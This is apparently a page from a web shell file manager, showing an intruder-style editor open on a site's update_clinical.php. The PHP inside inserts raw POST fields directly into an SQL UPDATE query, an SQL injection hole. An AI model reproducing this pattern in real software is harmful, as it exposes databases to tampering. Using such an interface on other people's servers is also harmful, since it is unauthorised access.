Gifari Industries - BD Cyber Security Team
Home
/
home
/
decohaslibrary
/
public_html
/
✏️
Editing: update_clinical.php
<body> <?php include 'sql.php'; //update $sql = "UPDATE clinical_books SET message = '$_POST[mname]', other = '$_POST[lname]' WHERE id = '$_POST[id]'"; if(mysqli_query($con, $sql)) header("refresh:1; url = clinical.php"); else echo "error"; /*{ echo "updated"; }else{ echo "error"; }*/ ?> </body>
💾 Save
❌ Cancel